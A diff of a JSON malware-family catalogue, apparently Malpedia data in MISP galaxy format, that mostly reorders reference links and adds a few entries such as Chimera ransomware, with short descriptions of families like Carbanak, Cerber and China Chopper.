"https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", - "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets" + "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" ], "synonyms": [ "Cadelle" @@ -16967,8 +17783,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn", - "https://twitter.com/8th_grey_owl/status/1357550261963689985", "https://www.datanet.co.kr/news/articleView.html?idxno=133346", + "https://twitter.com/8th_grey_owl/status/1357550261963689985", "https://www.youtube.com/watch?v=3cUWjojQXWE" ], "synonyms": [], @@ -16997,11 +17813,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader", + "https://blog.group-ib.com/prometheus-tds", "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", "https://orangecyberdefense.com/global/blog/cybersoc/in-the-eye-of-our-cybersoc-campo-loader-analysis-and-detection-perspectives/", - "https://blog.group-ib.com/prometheus-tds", - "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", - "https://unit42.paloaltonetworks.com/bazarloader-malware/" + "https://unit42.paloaltonetworks.com/bazarloader-malware/", + "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/" ], "synonyms": [], "type": [] @@ -17055,29 +17871,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", - "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html", - "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", - "https://threatintel.blog/OPBlueRaven-Part2/", - "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", - "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html", - "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://threatintel.blog/OPBlueRaven-Part1/", - "https://www.secureworks.com/research/threat-profiles/gold-niagara", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html", - "https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/", - "https://www.prodaft.com/m/reports/FIN7_TLPCLEAR.pdf", - "https://www.mandiant.com/resources/evolution-of-fin7", - "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", - "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html", + "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.prodaft.com/m/reports/FIN7_TLPCLEAR.pdf", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html", + "https://threatintel.blog/OPBlueRaven-Part2/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", "https://unit42.paloaltonetworks.com/atoms/mulelibra/", - "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", + "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/", + "https://threatintel.blog/OPBlueRaven-Part1/", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.mandiant.com/resources/evolution-of-fin7", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html" ], "synonyms": [ "Anunak", @@ -17093,12 +17909,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp", - "https://blog.avast.com/2013/04/08/carberp_epitaph/", - "https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf", + "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", "https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf", "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", - "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree" + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://blog.avast.com/2013/04/08/carberp_epitaph/", + "https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf" ], "synonyms": [], "type": [] @@ -17107,16 +17923,16 @@ "value": "Carberp" }, { - "description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp” which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.", + "description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed \u201cCarp\u201d which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", - "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412", "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", - "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html", "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" ], "synonyms": [], @@ -17184,7 +18000,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.catb", "https://minerva-labs.com/blog/new-catb-ransomware-employs-2-year-old-dll-hijacking-technique-to-evade-detection/", - "https://www.sentinelone.com/blog/decrypting-catb-ransomware-analyzing-their-latest-attack-methods/" + "https://www.sentinelone.com/blog/decrypting-catb-ransomware-analyzing-their-latest-attack-methods/", + "http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf" ], "synonyms": [], "type": [] @@ -17211,26 +18028,26 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", - "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", - "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", - "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", - "https://risky.biz/whatiswinnti/", - "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", - "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", - "https://blog.avast.com/progress-on-ccleaner-investigation", - "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", + "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html", "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", - "https://www.secureworks.com/research/threat-profiles/bronze-atlas", - "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", - "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", "https://twitter.com/craiu/status/910148928796061696", - "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", - "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", - "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", - "https://stmxcsr.com/persistence/print-processor.html", - "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", + "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", + "https://risky.biz/whatiswinnti/", "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", - "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" + "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", + "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", + "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", + "https://stmxcsr.com/persistence/print-processor.html", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", + "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", + "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", + "https://blog.avast.com/progress-on-ccleaner-investigation", + "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", + "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", + "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", + "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", + "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/" ], "synonyms": [ "DIRTCLEANER" @@ -17273,22 +18090,23 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html", - "https://www.youtube.com/watch?v=y8Z9KnL8s8s", + "https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf", "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/", - "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.justice.gov/usao-dc/press-release/file/1021186/download", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.youtube.com/watch?v=y8Z9KnL8s8s", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf", - "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", + "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf", + "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html", "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus" ], "synonyms": [], @@ -17314,8 +18132,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ceta_rat", - "https://blogs.quickheal.com/cetarat-apt-group-targeting-the-government-agencies/", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388" + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388", + "https://blogs.quickheal.com/cetarat-apt-group-targeting-the-government-agencies/" ], "synonyms": [], "type": [] @@ -17341,7 +18159,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaes", - "https://decoded.avast.io/anhho/chasing-chaes-kill-chain/" + "https://decoded.avast.io/anhho/chasing-chaes-kill-chain/", + "https://blog.morphisec.com/chaes4-new-chaes-malware-variant-targeting-financial-and-logistics-customers" ], "synonyms": [], "type": [] @@ -17354,10 +18173,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot", - "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/", "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/", - "https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/", "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack", + "https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec", "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/" ], "synonyms": [], @@ -17384,16 +18203,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos", + "https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html", + "https://twitter.com/vinopaljiri/status/1519645742440329216", + "https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/", "https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html", + "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-in-fake-minecraft-alt-list-brings-destruction", + "https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/", + "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia", "https://www.bleepingcomputer.com/news/security/roblox-game-pass-store-used-to-sell-ransomware-decryptor/", "https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging", - "https://brianstadnicki.github.io/posts/malware-chaos-ransomware-v4/", "https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree", - "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-in-fake-minecraft-alt-list-brings-destruction", - "https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html", - "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia", - "https://twitter.com/vinopaljiri/status/1519645742440329216", - "https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/" + "https://brianstadnicki.github.io/posts/malware-chaos-ransomware-v4/" ], "synonyms": [ "FakeRyuk", @@ -17406,13 +18226,13 @@ "value": "Chaos (Windows)" }, { - "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.", + "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim\u2019s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone", "https://github.com/TheEnergyStory/malware_analysis/tree/master/TajMahal", - "https://securelist.com/project-tajmahal/90240/", - "https://securelist.com/apt-trends-report-q2-2019/91897/" + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://securelist.com/project-tajmahal/90240/" ], "synonyms": [ "Taj Mahal" @@ -17440,12 +18260,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", - "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html" + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html" ], "synonyms": [ "HAYMAKER", @@ -17461,9 +18281,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray", + "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf", "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", - "https://www.us-cert.gov/ncas/analysis-reports/ar20-045c", - "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf" + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045c" ], "synonyms": [ "CROWDEDFLOUNDER" @@ -17492,8 +18312,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/", - "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html" + "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" ], "synonyms": [ "cherry_picker", @@ -17518,84 +18338,99 @@ "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", "value": "ChewBacca" }, + { + "description": "According to PCrisk, Chimera is a ransomware virus that encrypts files stored on infected systems. It is distributed using various false job applications, business offers, and infected email attachments. After encrypting the files, Chimera adds a . crypt extension to each file.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chimera", + "https://www.malwarebytes.com/blog/news/2015/12/inside-chimera-ransomware-the-first-doxingware-in-wild" + ], + "synonyms": [], + "type": [] + }, + "uuid": "830b0526-8e3b-4369-9677-9f8a31ca5ded", + "value": "Chimera" + }, { "description": "a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper", - "https://attack.mitre.org/groups/G0096", - "https://redcanary.com/blog/microsoft-exchange-attacks", - "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", - "https://www.secureworks.com/research/threat-profiles/bronze-union", - "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", - "https://www.youtube.com/watch?v=rn-6t7OygGk", - "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html", - "https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968", - "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/", + "https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders", + "https://twitter.com/ESETresearch/status/1366862946488451088", "https://us-cert.cisa.gov/ncas/alerts/aa20-259a", - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/", + "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/", + "https://redcanary.com/blog/microsoft-exchange-attacks", + "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection", + "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Backdoor%2Bvia%2BXFF%2BMysterious%2BThreat%2BActor%2BUnder%2BRadar.pdf", + "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/", + "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html", + "https://unit42.paloaltonetworks.com/atoms/iron-taurus/", + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html", + "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf", + "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html", + "https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://twitter.com/CyberRaiju/status/1373582619707867136", + "https://www.secureworks.com/research/threat-profiles/bronze-express", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a", + "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", + "https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html", + "https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/", + "https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/", + "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", + "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html", + "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf", + "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html", + "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits", "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", "https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/", - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", - "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers", - "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", - "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection", - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Backdoor%2Bvia%2BXFF%2BMysterious%2BThreat%2BActor%2BUnder%2BRadar.pdf", - "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf", - "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html", - "https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/", - "https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html", - "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", - "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html", - "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/", - 